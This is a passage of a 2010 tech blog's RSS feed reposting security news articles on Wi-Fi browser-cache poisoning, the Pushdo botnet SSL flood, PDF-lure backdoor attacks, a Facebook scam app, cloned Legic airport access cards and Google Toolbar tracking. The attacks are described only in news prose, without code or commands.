		<category><![CDATA[Security]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=499</guid>
		<description><![CDATA[By Ellen Messmer Network World February 3, 2010 http://www.computerworld.com/s/article/9151979/How_Wi_Fi_attackers_are_poisoning_Web_browsers?source=CTWNLE_nlt_security_2010-02-04 Public Wi-Fi networks such as those in coffee shops and airports present a bigger security threat than ever to computer users because attackers can intercede over wireless to &#8220;poison&#8221; users&#8217; browser caches in order to present fake Web pages or even steal data at a later &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/06/how-wi-fi-attackers-are-poisoning-web-browsers/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>By Ellen Messmer</p>
<p>Network World</p>
<p>February 3, 2010</p>
<p><a href="http://www.computerworld.com/s/article/9151979/How_Wi_Fi_attackers_are_poisoning_Web_browsers?source=CTWNLE_nlt_security_2010-02-04" target="_blank">http://www.computerworld.com/s/article/9151979/How_Wi_Fi_attackers_are_poisoning_Web_browsers?source=CTWNLE_nlt_security_2010-02-04</a></p>
<p>Public Wi-Fi networks such as those in coffee shops and airports present a bigger security threat than ever to computer users because attackers can intercede over wireless to &#8220;poison&#8221; users&#8217; browser caches in order to present fake Web pages or even steal data at a later time.That&#8217;s  according to security researcher Mike Kershaw, developer of the Kismet wireless network detector and intrusion-detection system, who spoke at the Black Hat conference.</p>
<p>He said it&#8217;s simple for an attacker over an 802.11 wireless network to take control of a Web browser cache by hijacking a common JavaScript file, for example.</p>
<p>&#8220;Once you&#8217;ve left Starbucks, you&#8217;re owned. I own your cache-control header,&#8221; he said. &#8220;You&#8217;re still loading the cache JavaScript when you go back to work.</p>
<p>&#8220;Open networks have no client protection,&#8221; said Kershaw, who also uses the handle Dragorn. &#8220;Nothing stops us from spoofing the [wireless access point] and talking directly to the client,&#8221; the user&#8217;s Wi-Fi-enabled device.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-499"></span></p>
<p>Knowledge gained from researchers over the past year, he said, is showing that browser-cache poisoning over Wi-Fi can be kept in a persistent state unless the user knows how to effectively empty the cache.</p>
<p>&#8220;Once the cache is poisoned, it&#8217;s going to stay there,&#8221; Kershaw said. This means that an attacker can intercede to &#8220;poison the URL&#8221; of the victim so that he will see a fake Web page when they try to visit a specific Web site or try to insert a &#8220;shim&#8221; that could &#8220;ship your internal pages off to a remote server once you&#8217;re in a VPN.&#8221;</p>
<p>The few defenses Kershaw suggested were continuously manually clearing the cache, or using private-browser mode. &#8220;Who knows how to clear the browser cache in an iPhone?&#8221; he asked.</p>
<p>Kershaw acknowledged he doesn’t know how widely attacks based on poisoning the browser cache via 802.11 actually are. But the potential for trouble is so evident he said he&#8217;d advise corporate security professionals to try to &#8220;forbid users from taking laptops onto open networks,&#8221; though he admitted, &#8220;Your users may lynch you.&#8221; He said some vendors, including Verizon, are looking at solving this problem with a custom client that is tied to specific operating systems.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/06/how-wi-fi-attackers-are-poisoning-web-browsers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NEED : India needs a separate cyber police force</title>
		<link>http://techblog.cyberphunkz.com/2010/02/04/need-india-needs-a-separate-cyber-police-force/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/04/need-india-needs-a-separate-cyber-police-force/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 06:12:20 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[indian police]]></category>
		<category><![CDATA[police]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=496</guid>
		<description><![CDATA[TNN 01 February 2010 http://timesofindia.indiatimes.com/india/India-needs-a-separate-cyber-police-force-Moily/articleshow/5521142.cms NEW DELHI: India urgently needs a well-trained special police force to deal with cyber crimes and it must be equipped and trained to deal with all kinds of internet bugs, law minister Veerappa Moily said on Sunday. &#8220;India does not have a specific police force to deal with cyber crimes &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/04/need-india-needs-a-separate-cyber-police-force/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>TNN</p>
<p>01 February 2010</p>
<p><a href="http://timesofindia.indiatimes.com/india/India-needs-a-separate-cyber-police-force-Moily/articleshow/5521142.cms" target="_blank">http://timesofindia.indiatimes.com/india/India-needs-a-separate-cyber-police-force-Moily/articleshow/5521142.cms</a></p>
<p>NEW DELHI: India urgently needs a well-trained special police force to deal with cyber crimes and it must be equipped and trained to deal with all kinds of internet bugs, law minister Veerappa Moily said on Sunday.</p>
<p>&#8220;India does not have a specific police force to deal with cyber crimes and implementation of laws against crimes in the virtual world. India needs it urgently following the footsteps of US and South Korea,&#8221; Moily said at an interactive seminar for judges, heads of police forces and prosecution of states here.</p>
<p>He said there were many impediments that needed to be overcome soon. While a vast majority of the police force or prosecutors in the country had no experience of tackling cyber crime, judges too lacked experience in appreciating evidence in such cases. As cyber crime knows no geographical boundary, the absence of international cooperation between police forces adds to the woes of victims and lets the culprit go scot free, he said.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-496"></span></p>
<p>It was attorney general G E Vahanvati who pointed out the danger potential of cyber crime as was shown by `Trojan horse&#8217; and `I love you&#8217; bug and said cyber crime was not limited to the web world but had been extended to mobile phones, which could be used to bombard a victim with messages and send illicit MMSes.</p>
<p>Chief Justice of India K G Balakrishnan said cyber crimes caused irreparable damage to the victims though it may not involve inflicting of physical pain. &#8220;Someone&#8217;s bank account can be wiped off depriving him of life-long savings and others can face huge loss of reputation when his face is morphed and put in an obscene video on the net,&#8221; he said while emphasising on sensitisation of the police, prosecutors and judiciary about the consequences of the crime.</p>
<p>Supreme Court judge and Cyber Law Enforcement Committee chairman, Justice Altamas Kabir, said the attending DGPs and judges should make efforts to understand the nitty-gritty of the anti-cyber crime law enacted by the country in the shape of IT Act, 2000. However, he said going by the growing ingenuity of cyber criminals, there was a need for expanding the definitions of various crimes listed in the law.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/04/need-india-needs-a-separate-cyber-police-force/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>CIA, PayPal under bizarre SSL assault</title>
		<link>http://techblog.cyberphunkz.com/2010/02/02/cia-paypal-under-bizarre-ssl-assault/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/02/cia-paypal-under-bizarre-ssl-assault/#comments</comments>
		<pubDate>Tue, 02 Feb 2010 10:03:43 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[CIA]]></category>
		<category><![CDATA[paypal]]></category>
		<category><![CDATA[SSL]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=490</guid>
		<description><![CDATA[ATTACKED : CIA, PayPal under bizarre SSL assault Plus hundreds of others By Dan Goodin in San Francisco 29 January 2010 http://www.theregister.co.uk/2010/01/29/strange_ssl_web_attack/ The Central Intelligence Agency, PayPal, and hundreds of other organizations are under an unexplained assault that&#8217;s bombarding their websites with millions of compute-intensive requests. The &#8220;massive&#8221; flood of requests is made over the &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/02/cia-paypal-under-bizarre-ssl-assault/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong>ATTACKED : CIA, PayPal under bizarre SSL assault</strong></p>
<p><strong><em>Plus hundreds of others</em></strong></p>
<p>By Dan Goodin in San Francisco</p>
<p>29 January 2010</p>
<p><a href="http://www.theregister.co.uk/2010/01/29/strange_ssl_web_attack/" target="_blank">http://www.theregister.co.uk/2010/01/29/strange_ssl_web_attack/</a></p>
<p>The Central Intelligence Agency, PayPal, and hundreds of other organizations are under an unexplained assault that&#8217;s bombarding their websites with millions of compute-intensive requests.</p>
<p>The &#8220;massive&#8221; flood of requests is made over the websites&#8217; SSL, or secure-sockets layer, port, causing them to consume more resources than normal connections, according to researchers at Shadowserver Foundation, a volunteer security collective. The torrent started about a week ago and appears to be caused by recent changes made to a botnet known as Pushdo.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-490"></span></p>
<p>&#8220;What do I mean by massive? I mean you are likely seeing an unexpected increase in traffic by several million hits spread out across several hundred thousand IP addresses,&#8221; Shadowserver&#8217; Steven Adair wrote. &#8220;This might be a big deal if you&#8217;re used to only getting a few hundred or thousands of hits a day or you don&#8217;t have unlimited bandwidth.&#8221;</p>
<p>Shadowserver has identified 315 websites that are the recipients of the SSL assault. In addition to <a href="http://cia.gov/" target="_blank">cia.gov</a> and <a href="http://paypal.com/" target="_blank">paypal.com</a>, other sites include <a href="http://yahoo.com/" target="_blank">yahoo.com</a>, <a href="http://americanexpress.com/" target="_blank">americanexpress.com</a>, and <a href="http://sans.org/" target="_blank">sans.org</a>.</p>
<p>It&#8217;s not clear why Pushdo has unleashed the torrent. Infected PCs appear to initiate the SSL connections, along with a bit of junk, disconnect and then repeat the cycle. They don&#8217;t request any resources from the website or do anything else.</p>
<p>&#8220;We find it hard to believe this much activity would be used to make the bots blend in with normal traffic, but at the same time it doesn&#8217;t quite look like a DDoS either,&#8221; Adair wrote.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/02/cia-paypal-under-bizarre-ssl-assault/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>China Hacks Inspire Copycats</title>
		<link>http://techblog.cyberphunkz.com/2010/01/31/china-hacks-inspire-copycats/</link>
		<comments>http://techblog.cyberphunkz.com/2010/01/31/china-hacks-inspire-copycats/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 04:27:14 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[copycats]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=487</guid>
		<description><![CDATA[COPYCAT : China Hacks Inspire Copycats Jaikumar Vijayan, Computerworld Jan 24, 2010 http://www.pcworld.com/article/187534/china_hacks_inspire_copycats.html? Malicious hackers have begun using the recent cyberattacks against Google and more than 30 other companies as lures for launching even more targeted attacks, security firm F-Secure said in a blog post today. The company reported spoofed e-mails purporting to contain details &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/01/31/china-hacks-inspire-copycats/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong>COPYCAT : China Hacks Inspire Copycats</strong></p>
<p>Jaikumar Vijayan,</p>
<p>Computerworld</p>
<p>Jan 24, 2010</p>
<p><a href="http://www.pcworld.com/article/187534/china_hacks_inspire_copycats.html" target="_blank">http://www.pcworld.com/article/187534/china_hacks_inspire_copycats.html</a>?</p>
<p>Malicious hackers have begun using the recent cyberattacks against Google and more than 30 other companies as lures for launching even more targeted attacks, security firm F-Secure said in a blog post today.</p>
<p>The company reported spoofed e-mails purporting to contain details on the alleged Chinese attacks that contain a PDF attachment. When opened, it installs and runs the Acrobat.exe backdoor on the user&#8217;s machine.</p>
<p>A screen shot posted on F-Secure&#8217;s Web site showed an e-mail designed to look like it came from George Washington University. The e-mail, with the subject header &#8216;Chinese cyberattack,&#8217; offered the target a review of an article on the recent attacks that the purported author had just written for the Far Eastern Economic Review.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-487"></span></p>
<p>When the attached PDF is opened in Acrobat Reader, it exploits a known vulnerability in the doc.media.newPlayer function of the reader to install a back door on the user&#8217;s system, F-Secure said. The flaw was patched by Adobe last week.</p>
<p>F-Secure reported seeing targeted attacks using similarly poisoned PDF files being directed at U.S. military contractors earlier this week. In that case, the e-mails were designed to appear as if they were from the U.S. Air Force and purported to contain information on an actual Department of Defense event scheduled for later this year.</p>
<p>F-Secure also said it has learned of a similar e-mail targeting the &#8220;intelligence sector,&#8221; but offered no further details.</p>
<p>Attacks that attempt to take advantage of popular news events or stories to fool users into clicking on malicious attachments or browsing to malicious sites have become common in recent years. What&#8217;s different now is that such attacks are being directed at specific individuals and are increasingly tailored to appear as if they are from a trusted source. Many of the so-called Advanced Persistent Threats (APT) faced by large companies such as Google rely heavily on social-engineering tricks to get targeted individuals to open infected e-mails or download malicious files.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/01/31/china-hacks-inspire-copycats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ADVISORY: Scam Application on Facebook</title>
		<link>http://techblog.cyberphunkz.com/2010/01/30/advisory-scam-application-on-facebook/</link>
		<comments>http://techblog.cyberphunkz.com/2010/01/30/advisory-scam-application-on-facebook/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 12:07:29 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Bad Ideas]]></category>
		<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[alert]]></category>
		<category><![CDATA[scams]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=484</guid>
		<description><![CDATA[There is a new facebook application doing the rounds by the name of Photas, it will say that a frnd of urs commented on a photo of you, and when u try to check the photo, it will take u to this page: http://www.facebook.com/apps/application.php?id=448829670716 , goign there will send this trojan to all your friends &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/01/30/advisory-scam-application-on-facebook/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>There is a new facebook application doing the rounds by the name of Photas, it will say that a frnd of urs commented on a photo of you, and when u try to check the photo, it will take u to this page: <a href="http://www.facebook.com/apps/application.php?id=448829670716" target="_blank">http://www.facebook.com/apps/application.php?id=448829670716</a> , goign there will send this trojan to all your friends and thus spread exponentially.<br />
Do not fall for this.</p>
<p>In General, dont take everything for granted on sites like facebook etc, look before you add apps, u may never know what you might give away.</p>
<p>Forward this to your friends so that they also dont fall for this.</p>
<p><img title="?ui=2&amp;view=att&amp;th=1267f1a7ce7411a2&amp;attid=0.1&amp;disp=attd&amp;realattid=ii_1267f1a7ce7411a2&amp;zw" src="https://mail.google.com/mail/?ui=2&amp;ik=aec1ed31cc&amp;view=att&amp;th=1267f1ba6a0035fb&amp;attid=0.1&amp;disp=emb&amp;realattid=ii_1267f1a7ce7411a2&amp;zw" alt="?ui=2&amp;view=att&amp;th=1267f1a7ce7411a2&amp;attid=0.1&amp;disp=attd&amp;realattid=ii_1267f1a7ce7411a2&amp;zw" /></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/01/30/advisory-scam-application-on-facebook/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CRACK : Hackers crack airport access</title>
		<link>http://techblog.cyberphunkz.com/2010/01/30/crack-hackers-crack-airport-access/</link>
		<comments>http://techblog.cyberphunkz.com/2010/01/30/crack-hackers-crack-airport-access/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 06:31:00 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[airport]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=481</guid>
		<description><![CDATA[CRACK : Hackers crack airport access By Matthias Kremp 14/01/2010 http://www.spiegel.de/netzwelt/netzpolitik/0,1518,671980,00.html (Translated from German by Google) http://translate.google.com/translate?u=http%3A%2F%2Fwww.spiegel.de%2Fnetzwelt%2Fnetzpolitik%2F0%2C1518%2C671980%2C00.html&#38;sl=de&#38;tl=en&#38;hl=&#38;ie=UTF-8 Alarming vulnerability to major German airports: With a simple 200-euro device can outsmart the security barriers. Hackers of the CCC led to ARD reporters can be scanned as easily access cards, and then electronically simulated &#8211; the police &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/01/30/crack-hackers-crack-airport-access/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong>CRACK : Hackers crack airport access</strong></p>
<p>By Matthias Kremp</p>
<p>14/01/2010</p>
<p><a href="http://www.spiegel.de/netzwelt/netzpolitik/0,1518,671980,00.html" target="_blank">http://www.spiegel.de/netzwelt/netzpolitik/0,1518,671980,00.html</a> (Translated from German by Google)</p>
<p><a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.spiegel.de%2Fnetzwelt%2Fnetzpolitik%2F0%2C1518%2C671980%2C00.html&amp;sl=de&amp;tl=en&amp;hl=&amp;ie=UTF-8" target="_blank">http://translate.google.com/translate?u=http%3A%2F%2Fwww.spiegel.de%2Fnetzwelt%2Fnetzpolitik%2F0%2C1518%2C671980%2C00.html&amp;sl=de&amp;tl=en&amp;hl=&amp;ie=UTF-8</a></p>
<p>Alarming vulnerability to major German airports: With a simple 200-euro device can outsmart the security barriers. Hackers of the CCC led to ARD reporters can be scanned as easily access cards, and then electronically simulated &#8211; the police union is appalled.</p>
<p>After the foiled bomb attack in Detroit, the security agencies and airports have reacted quickly and sharply, before the inspection are always long queues, because the checks have been stepped up. Each piece of hand baggage is searched, each fluid control, many passengers two or three times chased through the metal detector.</p>
<p>It is an easy way to circumvent the controls &#8211; the ARD-Magazin &#8220;Contrasts&#8221; is now demonstrating that it appears in many German airports are a vulnerability that can be exploited by simple means.</p>
<p>The allegations are directed against several German airports used to access security system of the Swiss agent LEGIC It should be easy to crack &#8211; how easy to have hackers from the Chaos Computer Club (CCC reporters) presented.</p>
<p>The operating principle of the system is simple: Each employee receives an ID card with built-in microchip. To get into airport security areas, the card is tilted close to a reader. This takes over the air on contact with the chip that reads the data and opens the door, where the institution of the chip is identified as being authorized to access.</p>
<p>But with a relatively simple device can be cut short this seemingly secure protection mechanism. Namely, with a &#8220;programmable RFID reader, which can both pretend to be a reader &#8211; and can pretend to be a map,&#8221; said Karsten Nohl, CCC member of the &#8220;contrast&#8221; searchers. Assemble the apparatus, therefore, will cost less than $ 200.</p>
<p>With this device you can first read an access card &#8211; and then switch it so that it emulates the card, then electronically replicates. In the end, can be with the RFID reader to open those doors, which also include the original would have been granted access.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-481"></span></p>
<p><strong>15 centimeters range approximation</strong></p>
<p>In an interview with SPIEGEL ONLINE, the manufacturer Legic confirmed &#8220;that members of the Chaos Computer Club has been able to evaluate by reverse engineering the algorithm of Prime and disclose.</p>
<p>Nohl and other CCC members were &#8220;simply shocked to even find any hurdles that we would have to overcome.&#8221; Only the limited range of the used RFID reader and emulation device using brakes. With a suitably powerful power supply can be ideally bridging distances of about 70 centimeters. If one wishes to remain anonymous and do not bulky power apparatuses attention to themselves, reduces the distance to up to 15 centimeters. But it was no real obstacle, &#8220;said ARD editor Matthias Deiss</p>
<p>To read out a map of it ultimately matter if you stands on an escalator next to an airport employee. Because the ID cards bear the usually either on a long ribbon around the neck or with a short bunch of keys on his belt.</p>
<p>The Swiss compromised by the hackers access system is used in Germany at the airports of Hamburg, Berlin-Tegel, Stuttgart, Dresden and Hanover &#8211; and marketed internationally. How far with the stunt is in doubt, was an employee of the Hamburg airport the &#8220;contrasts&#8221; reporters clear. He had his access card entry to the security area and could thus &#8220;on access gates, roads, terminals and gates directly via the apron and of course get on an airplane.&#8221; With the RFID reader, the same should be possible.</p>
<p><strong>The system is outdated</strong></p>
<p>The Hamburg Airport recognizes the vulnerability. However, it is pointed out that the access is not the only security mechanism of the airport. With other systems would ensure that no unauthorized persons enter the premises. The nature of these systems has been, &#8220;contrasts&#8221; but not answered. An exchange of more than 15,000 access cards and readers can not get around 500 for cost reasons.</p>
<p>If you read the product description, the Legic published on his website, anyway, the question arises, why use airports specifically chosen this system to protect access. Accordingly, were key to the development of the system presented at the 1992 Cebit, the simplification and comfort in mind. It is also designed for controlling access to &#8220;large-scale projects in the leisure industry&#8221;, say for example in holiday resorts. According to the data sheet a &#8220;basic security with a focus on organization and convenience&#8221; is one of the main features of the system.</p>
<p>Legic told SPIEGEL ONLINE with the Prime System Chriffrierverfahren use a firm that meets the technical possibilities of 1992. The company has argued that such procedures are based essentially on the secrecy of the algorithms used. Compared with today&#8217;s methods &#8220;have these older methods, a lower safety level than modern systems&#8221;, which gives the manufacturer openly. He recommends that its customers, the technology &#8220;reassess and, where necessary, replace it with modern security systems.&#8221; However, even today is still guaranteed the security &#8211; if one Legic Prime with additional measures such as a pin number, a video surveillance or simply supplement an usher. But because it costs, just as a replacement of the entire system.</p>
<p><strong>Interior Ministry and police union response</strong></p>
<p>According to a spokesman for the Federal Interior Ministry is on the airport operators to review the security controls already been suggested. Rainer Wendt, chairman of the German police union, which is too little &#8211; he asks to replace the cracked security system immediately and put on the cutting edge of technology.</p>
<p>For the omissions of the operators, he shows no sympathy. He proposes to put the security operation now under the supervision of the federal police to: &#8220;so that the airport can be more sloppy as they want.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/01/30/crack-hackers-crack-airport-access/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SURVEILLANCE : Google Toolbar tracking users when &#8216;disabled&#8217;</title>
		<link>http://techblog.cyberphunkz.com/2010/01/30/surveillance-google-toolbar-tracking-users-when-disabled/</link>
		<comments>http://techblog.cyberphunkz.com/2010/01/30/surveillance-google-toolbar-tracking-users-when-disabled/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 05:43:00 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[google hacking]]></category>
		<category><![CDATA[toolbar]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2010/01/30/surveillance-google-toolbar-tracking-users-when-disabled/</guid>
		<description><![CDATA[We&#8217;ll ignore this window if you close it By Cade Metz in San Francisco Posted in Security, 27th January 2010 00:28 GMT http://www.theregister.co.uk/2010/01/27/google_toolbar_caught_transmitting_data_when_disabled/ Google has updated its browser toolbar after the application was caught tracking urls even when specifically &#8220;disabled&#8221; by the user. In a Monday blog post, Harvard professor and noted Google critic Ben &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/01/30/surveillance-google-toolbar-tracking-users-when-disabled/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em>We&#8217;ll ignore this window if you close it</em></strong></p>
<p>By Cade Metz in San Francisco</p>
<p>Posted in Security, 27th January 2010 00:28 GMT</p>
<p><a href="http://www.theregister.co.uk/2010/01/27/google_toolbar_caught_transmitting_data_when_disabled/" target="_blank">http://www.theregister.co.uk/2010/01/27/google_toolbar_caught_transmitting_data_when_disabled/</a></p>
<p>Google has updated its browser toolbar after the application was caught tracking urls even when specifically &#8220;disabled&#8221; by the user.</p>
<p>In a Monday blog post, Harvard professor and noted Google critic Ben Edelmen provided video evidence* of the Google toolbar transmitting data back to the Mountain View Chocolate Factory after he chose to disable the application in the browser window he was currently using.</p>
<p>The Google toolbar offers two disable options: one is meant to disable the toolbar &#8220;permanently,&#8221; and the other is meant to disable the app &#8220;only for this window.&#8221;</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-480"></span></p>
<p>In a statement passed to The Reg, Google has acknowledged the bug. According to the statement, the bug affects Google Toolbar versions 6.3.911.1819 through 6.4.1311.42 for Internet Explorer. An update that fixes the bug is now available here, and the company intends to automatically update users&#8217; toolbars sometime today.</p>
<p>The statement also says that the bug does not occur if you open a new tab after disabling the toolbar for a particular window. In the statement, Google goes on to say that the bug disappears if you restart your browser, but this doesn&#8217;t quite make sense. If you&#8217;re interested in disabling Google toolbar for a particular window, you aren&#8217;t going to close that window.</p>
<p>&#8220;For that option to work as its name promises, Google Toolbar must cease transmissions immediately,&#8221; Edelman says. &#8220;Fact is, the &#8216;Disable Google Toolbar only for this window&#8217; option doesn&#8217;t work at all: It does not actually disable Google Toolbar for the specified window.&#8221;</p>
<p>It would appear that in saying the bug is fixed when the browser relaunches, Google is referring to a second bug Edelman uncovered. The Harvard prof also found that the toolbar continued to transmit data when he attempted to disable it through Internet Explorer&#8217;s &#8220;Manage Add-ons&#8221; window.</p>
<p>With the Google toolbar, certain &#8220;enhanced features&#8221; require the transmission of data back to Google servers. These features include the ability to view a website&#8217;s Google PageRank, essentially a measure of its importance on the web at large, and the new Sidewiki, a means of adding meta-comments to webpages. Using a network monitor, Edelman confirmed that if &#8220;enhanced features&#8221; are activated, Google collects domain names and associated directories, filenames, URL parameters, and search terms.</p>
<p>The user chooses whether to turn on &#8220;enhanced features,&#8221; but Edelman argues that it&#8217;s much too easy for a user to do so without completely realizing the consequences. The toolbar&#8217;s standard installation routine launches a &#8220;bubble message&#8221; that pushes readers to turn on the features, he says, and it&#8217;s less than clear about what data is being transmitted.</p>
<p>&#8220;The feature is described as &#8216;enhanced&#8217; and &#8216;helpful,&#8217; and Google chooses to tout it with a prominence that indicates Google views the feature as important,&#8221; Edelman writes. &#8220;Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus &#8211; so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation.&#8221;</p>
<p>Yes, he continues, the message points out that the toolbar &#8220;tells us what site you&#8217;re visiting by sending Google the url.&#8221; But he argues this stops short of explaining that it collects everything from directories, filenames, and URL parameters to search keywords.</p>
<p>What&#8217;s more, Edelman says, turning off &#8220;enhanced features&#8221; is more difficult than turning them on &#8211; especially for the average Joe. It appears that the features can&#8217;t be turned off unless you uninstall the entire toolbar. Or &#8220;disable&#8221; it. But that doesn&#8217;t always work. Or at least it didn&#8217;t until Edelman noticed it didn&#8217;t.</p>
<p>* Video evidence at</p>
<p>(<a href="http://www.benedelman.org/spyware/images/googletoolbar-jan10/disablex-video-012110.html" target="_blank">http://www.benedelman.org/spyware/images/googletoolbar-jan10/disablex-video-012110.html</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/01/30/surveillance-google-toolbar-tracking-users-when-disabled/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mobilewitch Bluetooth Remote Control</title>
		<link>http://techblog.cyberphunkz.com/2010/01/12/mobilewitch-bluetooth-remote-control/</link>
		<comments>http://techblog.cyberphunkz.com/2010/01/12/mobilewitch-bluetooth-remote-control/#comments</comments>
		<pubDate>Tue, 12 Jan 2010 07:50:36 +0000</pubDate>
